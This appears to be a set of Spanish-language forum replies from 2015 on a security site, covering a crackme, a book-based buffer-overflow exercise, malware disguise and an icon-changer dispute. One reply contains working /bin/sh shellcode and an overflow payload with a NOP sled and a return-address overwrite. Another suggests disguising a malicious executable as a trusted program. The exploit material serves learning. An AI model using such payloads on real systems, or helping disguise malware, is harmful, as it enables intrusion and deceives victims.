|
281
|
Programación / Ingeniería Inversa / Re: [KeygenMe] Matrix
|
en: 25 Marzo 2015, 20:35 pm
|
Como puse en mi post: Vi todo el tema de la matriz de 3x3 (La del User, la de la pass y la temporal). Pero me pareció que el cálculo final era el que puse... En fin, está bueno que otros se animen a meterle mano a los retos. Será que si me equivoco más seguido, habrá más participación??? Saludos! Comienza a decir que no se pueden crackear, así participarán todos jaja
|
|
|
282
|
Seguridad Informática / Bugs y Exploits / Re: Exploiting básico (Buffer Overflow) [Ayuda]
|
en: 22 Marzo 2015, 16:18 pm
|
En estos casos podrías usar printf() para obtener la dirección de la variable local de destino de la función strcpy(), como dato te comento que el libro lo desarrollé bajo la última versión de Kali Linux (tiene algunas variantes a los paso a paso del libro pero en si es muy similar) No te queda otra que probar imprimir direcciones desde afuera del programa, por cierto me imagino que tu SO es de x86, en esta área debes ser muy paciente y aprender a base de errores (depurar, depurar y depurar) intenta nuevas ideas, estás seguro de la shellcode? Intentate simplemente poner interrupciones INT 0x3 para verificar si alcanzas a llegar? Te recomiendo leer cracking en linux por Juan José (creo que ese era el nombre del autor) leete solo los capítulos GDB I y GDB II para que entiendas el funcionamiento de este fantástico debugger, si eres un peresozo, prueba con EDB (un depurador que es 99% igual a OllyDbg).
Saludos
|
|
|
284
|
Seguridad Informática / Bugs y Exploits / Re: Exploiting básico (Buffer Overflow) [Ayuda]
|
en: 19 Marzo 2015, 03:22 am
|
Yo hace unos días me terminé el libro, solo te diré que si te complicó el principio del libro, te tengo malas noticias el capítulo Heap Overflow y Advance Heap Overflow es un terror, por lo menos para mi el segundo fue un caos, no estaba para nada detallado los ataques y tuve que leer bastante documentación para poder entender algo, y luego al fin logré entender casi todo, el libro es excelente, te lo recomiendo al 100% pero requiere de una base algo fuerte a lo que concierne a Ing. Inversa.
Bueno el error que te aparece es más que claro, se está intentando ejecutar una instrucción ilegal, es decir que no permitida, esto puede ocurrir por dos cosas: 1) Se está saltando a una dirección errada y no se está yendo a la shellcode. 2) Se está saltando a una zona intermedia de la shellcode lo cual genera el error.
Veamos tu Payload, debes siempre explicar cada parte de el, ya que casi nadie sabe la representación de hexadecimal a lenguaje ensamblador:
./prog `perl -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"."AAAAAAAAAAAAAAAAAAAAA"."\x80\xf6\xff\xbf"'`
[shellcode][relleno][EIP*]
*sobre-escritura del EIP o dirección de retorno.
Intenta poner una cabecera en antes de la shellcode, te recomiendo NOPs: ./prog `perl -e 'print "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"."AAAAAAAAAAAAAAAAAAAAA"."\x80\xf6\xff\xbf"'`
Debería funcionar, ahora verifica siempre poniendo BP en la zona en donde debería redireccionar el flujo del programa, en este caso "\x80\xf6\xff\xbf"', te daré un truco para que sea más cómodo diseñar tu payload en Perl, no sé por qué el autor del tutorial no lo usa, las direcciones las debes poner en orden little endian, como solución ponlas de forma normal de esta forma: ./prog `perl -e 'print "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"."AAAAAAAAAAAAAAAAAAAAA" . pack('V',0xbffff680)'`
No es más cómodo?
Cuéntame que tal te va, si tienes dudas por favor dímelas, necesito repasar.
PD: puedes poner el nº de página.
|
|
|
285
|
Seguridad Informática / Análisis y Diseño de Malware / Re: duda sobre los virus y troyanos?
|
en: 18 Marzo 2015, 03:03 am
|
El usuario no creo que posea las habilidades para enfrentarse a fallos de seguridad, por eso no creo que sea necesario detallarle sobre shellcodes, con respecto a camuflar para que complicarse tanto e intentar enviar una imagen o mp3, mejor enviar directamente un exe pero aparentando ser un exe confiable, por lo cual camuflar, bindear, joinear jaja sería una solución válida.
|
|
|
288
|
Seguridad Informática / Análisis y Diseño de Malware / Re: Icon changer
|
en: 16 Marzo 2015, 14:05 pm
|
Parece que al final 79137913 no era tan experto en vb como decia. Ni una disculpa? Ultimo aporte en la comunidad. Salud
Experto? Nadie aquí se ha nombrado un experto en materia, el realizó un análisis superficial, el cual denotó un comportamiento anómalo, luego otro usuario revisó más a fondo tal comportamiento (copiar un archivo en carpeta %system%) y no arrojó nada, pero debes entender que no es bien presentable un usuario que comparte archivos sin código de fuente, un ejecutable cifrado que no requiere ser cifrado, que el programa que comparte se copie en un PATH tan curioso.
|
|
|
|
|
|
|